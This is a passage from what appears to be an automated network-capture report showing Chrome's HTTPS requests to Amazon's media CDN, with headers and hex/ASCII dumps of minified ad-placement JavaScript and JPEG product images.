                                                                                                                                                                                                        Data Ascii: eframe.csaEvent.1",metricName:e+":"+t.name+":"+t.id,metricValue:a},{ent:"all"})}catch(n){i("Error with 'logCsaEvent' CSA",n)}},I=function(e,t){if(void 0===t&&(t=1),window.csa)try{window.csa("Events",{producerId:"adplacements"})("log",{schemaId:"ApeSafefra
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 74 20 74 2e 6a 73 6f 6e 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 46 28 65 2e 73 74 61 74 75 73 2c 65 2e 68 74 6d 6c 2c 65 2e 73 63 72 69 70 74 29 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 65 74 63 68 20 74 68 65 20 66 65 65 64 62 61 63 6b 20 68 74 6d 6c 2f 6c 69 6e 6b 2f 73 63 72 69 70 74 2f 6c 61 62 65 6c 22 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 77 69 6e 64 6f 77 52 65 70 6f 3d 65 7d 7d 63 6c 61 73 73 20 55 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 29 7b 74 68 69 73 2e 77 65 62 6c 61 62 73 57 69 6e 64 6f 77 3d 65 2c 74 68 69 73 2e 70 72 65 66 69 78 3d 74 2c 74 68 69 73 2e 69 73 54 31 3d 28 29 3d 3e 22 74 31 22 3d 3d 3d 74 68 69 73 2e 77 65 62 6c 61 62 54 72 65 61 74 6d 65 6e 74 28 29 2c
                                                                                                                                                                                                        Data Ascii: t t.json();return new F(e.status,e.html,e.script)}throw Error("Could not fetch the feedback html/link/script/label")}constructor(e){this.windowRepo=e}}class U{constructor(e,t){this.weblabsWindow=e,this.prefix=t,this.isT1=()=>"t1"===this.weblabTreatment(),
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 72 65 74 75 72 6e 20 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 2e 6c 61 62 65 6c 54 65 78 74 2c 56 28 74 2c 65 2e 6c 61 62 65 6c 53 74 79 6c 65 29 2c 74 7d 28 74 29 29 2c 61 7d 31 3d 3d 3d 74 2e 70 6f 73 69 74 69 6f 6e 3f 6e 75 6c 6c 3d 3d 3d 28 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 7c 7c 61 2e 70 72 65 70 65 6e 64 28 69 28 65 2c 74 29 29 3a 30 3d 3d 3d 74 2e 70 6f 73 69 74 69 6f 6e 26 26 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 29 7c 7c 76 6f 69 64 20 30 3d
                                                                                                                                                                                                        Data Ascii: function(e){const t=document.createElement("div");return t.innerHTML=e.labelText,V(t,e.labelStyle),t}(t)),a}1===t.position?null===(a=document.getElementById(e))||void 0===a||a.prepend(i(e,t)):0===t.position&&(null===(n=document.getElementById(e))||void 0=
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 64 65 3a 22 53 45 22 2c 68 6f 73 74 6e 61 6d 65 3a 22 77 77 77 2e 61 6d 61 7a 6f 6e 2e 73 65 22 2c 6e 61 6d 65 3a 22 53 77 65 64 65 6e 22 7d 2c 74 65 3d 65 3d 3e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 3d 3d 3d 65 2e 68 6f 73 74 6e 61 6d 65 2c 61 65 3d 65 3d 3e 21 28 74 65 28 6a 29 7c 7c 74 65 28 4a 29 7c 7c 74 65 28 59 29 7c 7c 74 65 28 51 29 7c 7c 74 65 28 4b 29 7c 7c 74 65 28 58 29 7c 7c 74 65 28 5a 29 7c 7c 74 65 28 65 65 29 29 7c 7c 6e 65 28 65 29 2c 6e 65 3d 65 3d 3e 7b 76 61 72 20 74 2c 61 2c 6e 2c 72 2c 73 2c 6f 3b 63 6f 6e 73 74 20 64 3d 5b 5d 3b 72 65 28 6e 75 6c 6c 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6e 3d 65 2e 75 72 6c 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 7c 7c 6e 75 6c 6c 3d 3d 3d 28 61 3d 6e 2e 70 61 72 61 6d 65 74 65 72 73
                                                                                                                                                                                                        Data Ascii: de:"SE",hostname:"www.amazon.se",name:"Sweden"},te=e=>location.hostname===e.hostname,ae=e=>!(te(j)||te(J)||te(Y)||te(Q)||te(K)||te(X)||te(Z)||te(ee))||ne(e),ne=e=>{var t,a,n,r,s,o;const d=[];re(null==e||null===(n=e.url)||void 0===n||null===(a=n.parameters
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 7a 28 29 2e 69 73 54 31 28 29 3f 32 3a 7a 28 29 2e 69 73 54 32 28 29 3f 34 3a 7a 28 29 2e 69 73 54 33 28 29 3f 38 3a 7a 28 29 2e 69 73 54 34 28 29 3f 31 36 3a 7a 28 29 2e 69 73 54 35 28 29 3f 33 32 3a 31 2c 6f 65 3d 65 3d 3e 6d 65 28 65 29 2c 64 65 3d 2f 5e 28 5b 41 2d 5a 61 2d 7a 30 2d 39 2b 2f 5d 7b 34 7d 29 2a 28 5b 41 2d 5a 61 2d 7a 30 2d 39 2b 2f 5d 7b 33 7d 3d 7c 5b 41 2d 5a 61 2d 7a 30 2d 39 2b 2f 5d 7b 32 7d 3d 3d 29 3f 24 2f 2c 6c 65 3d 65 3d 3e 64 65 2e 74 65 73 74 28 65 29 2c 63 65 3d 65 3d 3e 62 74 6f 61 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 29 29 29 2c 6d 65 3d 65 3d 3e 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 65 29 29 29 2c 75 65 3d 28 29
                                                                                                                                                                                                        Data Ascii: z().isT1()?2:z().isT2()?4:z().isT3()?8:z().isT4()?16:z().isT5()?32:1,oe=e=>me(e),de=/^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)?$/,le=e=>de.test(e),ce=e=>btoa(unescape(encodeURIComponent(e))),me=e=>decodeURIComponent(escape(atob(e))),ue=()
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 5b 65 2e 69 64 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 6e 75 6c 6c 7d 2c 74 68 69 73 2e 67 65 74 42 79 50 6c 61 63 65 6d 65 6e 74 3d 65 3d 3e 74 68 69 73 2e 67 65 74 42 79 50 6c 61 63 65 6d 65 6e 74 44 69 76 28 65 2e 64 69 76 29 2c 74 68 69 73 2e 73 61 76 65 3d 65 3d 3e 7b 74 68 69 73 2e 6c 69 67 68 74 41 64 57 69 6e 64 6f 77 2e 6c 69 67 68 74 41 64 73 5b 65 2e 70 6c 61 63 65 6d 65 6e 74 2e 64 69 76 2e 69 64 5d 3d 65 7d 2c 77 65 28 65 29 7d 7d 63 6f 6e 73 74 20 77 65 3d 65 3d 3e 7b 65 2e 6c 69 67 68 74 41 64 73 7c 7c 28 65 2e 6c 69 67 68 74 41 64 73 3d 7b 7d 29 7d 2c 67 65 3d 28 29 3d 3e 6e 65 77 20 76 65 28 77 69 6e 64 6f 77 29 2c 66 65 3d 65 3d 3e 67 65 28 29 2e 67 65 74 42 79 50 6c 61 63 65 6d 65 6e 74 44 69 76 28 65 29 2e 6c 69 67 68 74 41
                                                                                                                                                                                                        Data Ascii: [e.id])&&void 0!==t?t:null},this.getByPlacement=e=>this.getByPlacementDiv(e.div),this.save=e=>{this.lightAdWindow.lightAds[e.placement.div.id]=e},we(e)}}const we=e=>{e.lightAds||(e.lightAds={})},ge=()=>new ve(window),fe=e=>ge().getByPlacementDiv(e).lightA


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        105192.168.2.44988418.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC365OUTGET /images/I/41Qtra7lf+L.js HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1042INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/x-javascript
                                                                                                                                                                                                        Content-Length: 24182
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: e42037d0-74cf-469b-bff6-26f52e4cd5c8
                                                                                                                                                                                                        Date: Mon, 15 Apr 2024 06:22:25 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Thu, 25 May 2023 15:09:56 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-811,/images/I/41Qtra7lf+L
                                                                                                                                                                                                        Expires: Sun, 10 Apr 2044 06:22:25 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-811 /images/I/41Qtra7lf+L
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Via: 1.1 6ea1443d3dc39c2be7c23883fb0bd3e0.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 10540934
                                                                                                                                                                                                        Server-Timing: cdn-cache-hit,cdn-pop;desc="ZRH55-P1",cdn-rid;desc="RqE14-5L9OhJdu8pVNb7Vg3Yhy8-YNgxWf99FcU_QlAMcVX8bHXNRw==",cdn-hit-layer;desc="REC",cdn-downstream-fbl;dur=11,provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: RqE14-5L9OhJdu8pVNb7Vg3Yhy8-YNgxWf99FcU_QlAMcVX8bHXNRw==
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC15342INData Raw: 76 61 72 20 43 72 65 61 74 69 76 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 65 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 72 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 6e 2e 6f 28 74 2c 65 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 65 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c
                                                                                                                                                                                                        Data Ascii: var Creative=function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{configurabl
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC7044INData Raw: 37 29 2c 75 3d 6e 28 31 30 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 69 66 28 21 75 28 6e 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 65 3b 72 65 74 75 72 6e 21 21 28 22 6e 75 6d 62 65 72 22 3d 3d 61 3f 6f 28 6e 29 26 26 69 28 65 2c 6e 2e 6c 65 6e 67 74 68 29 3a 22 73 74 72 69 6e 67 22 3d 3d 61 26 26 65 20 69 6e 20 6e 29 26 26 72 28 6e 5b 65 5d 2c 74 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 38 30 30 2c 72 3d 31 36 2c 6f 3d 44 61 74 65 2e 6e 6f 77 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 30 2c 69 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 3d 6f 28 29 2c 61 3d 72 2d 28 75 2d 69
                                                                                                                                                                                                        Data Ascii: 7),u=n(10);t.exports=function(t,e,n){if(!u(n))return!1;var a=typeof e;return!!("number"==a?o(n)&&i(e,n.length):"string"==a&&e in n)&&r(n[e],t)}},function(t,e){var n=800,r=16,o=Date.now;t.exports=function(t){var e=0,i=0;return function(){var u=o(),a=r-(u-i
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1796INData Raw: 69 6f 6e 20 74 28 29 7b 77 69 6e 64 6f 77 2e 6d 72 61 69 64 2e 69 73 56 69 65 77 61 62 6c 65 28 29 3f 28 4c 28 29 2c 77 69 6e 64 6f 77 2e 6d 72 61 69 64 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 65 77 61 62 6c 65 43 68 61 6e 67 65 22 2c 74 29 29 3a 77 69 6e 64 6f 77 2e 6d 72 61 69 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 65 77 61 62 6c 65 43 68 61 6e 67 65 22 2c 74 29 7d 28 29 3a 28 28 30 2c 70 2e 64 65 66 61 75 6c 74 29 28 22 61 62 6f 76 65 54 68 65 46 6f 6c 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 49 3d 21 30 7d 29 2c 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 49 29 4c 28 29 3b 65 6c 73 65 7b 76 61 72 20 74
                                                                                                                                                                                                        Data Ascii: ion t(){window.mraid.isViewable()?(L(),window.mraid.removeEventListener("viewableChange",t)):window.mraid.addEventListener("viewableChange",t)}():((0,p.default)("aboveTheFold",function(){I=!0}),window.addEventListener("load",function(){if(I)L();else{var t


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        106192.168.2.44988618.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC378OUTGET /images/I/31nHAvUNnpL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC841INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 4812
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: bf9d9440-80ea-45bf-8587-8df88459fa18
                                                                                                                                                                                                        Date: Mon, 12 Aug 2024 04:38:43 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Fri, 25 Aug 2023 06:54:00 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-843,/images/I/31nHAvUNnpL
                                                                                                                                                                                                        Expires: Sun, 07 Aug 2044 04:38:43 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-843 /images/I/31nHAvUNnpL
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 ff571229df9f46b01b0e434bcb36f9e6.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 288267
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: 3hfklji0c3HiGjcMOIUjxkItbXB2y702EfaCd2s6smfZs0-JYPcpwg==
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC4812INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 32 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 05 06 07 08 09 01 02 03 04 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 cc b0 01 c7 20 00 00 00 79 fa 00 00 00 0e 39 00
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"2 y9


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        107192.168.2.44988718.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC378OUTGET /images/I/51vSWnZJsfL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC830INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 12239
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 9999ee41-20a0-4a8d-b4eb-f536bd1b236d
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 12:39:31 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 01 Jul 2024 10:16:38 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-432,/images/I/51vSWnZJsfL
                                                                                                                                                                                                        Expires: Wed, 10 Aug 2044 12:39:31 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-432 /images/I/51vSWnZJsfL
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 3a4b7ff21260552f6982d2003fec9c84.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: TNwbBb9pBOwnID1dzosEbxqm2gvWbrEOyPwJAX1qQvw_S6C85oRVbA==
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC12239INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 05 00 04 06 07 02 03 08 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec b0 67 29 66 8c 1f f3 99 d7 46 3e 94 97
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4g)fF>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        108192.168.2.44988818.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC378OUTGET /images/I/31OXYlKv9gL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC829INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3611
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 96194925-350c-4d77-84cf-c9b23d297f2d
                                                                                                                                                                                                        Date: Mon, 15 Jul 2024 21:24:49 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Thu, 25 May 2023 23:03:15 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-410,/images/I/31OXYlKv9gL
                                                                                                                                                                                                        Expires: Sun, 10 Jul 2044 21:24:49 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-410 /images/I/31OXYlKv9gL
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 d75d7156b5e1833582c3070298720664.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: A5maFk_VcJ6su5udwjwVYbDUg8bWRqgRlRSvET1bX1wpU74_pDwqHg==
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC3611INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 31 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 06 08 05 07 01 03 04 09 02 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b9 60 00 00 00 1e 63 d2 f1 fb 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"1`c


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        109192.168.2.44988518.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC411OUTGET /images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC778INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 94765
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 1662bc97-7b3d-40bc-b708-e276c3fe4969
                                                                                                                                                                                                        Last-Modified: Tue, 11 Jan 2022 14:51:27 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-756,/images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200
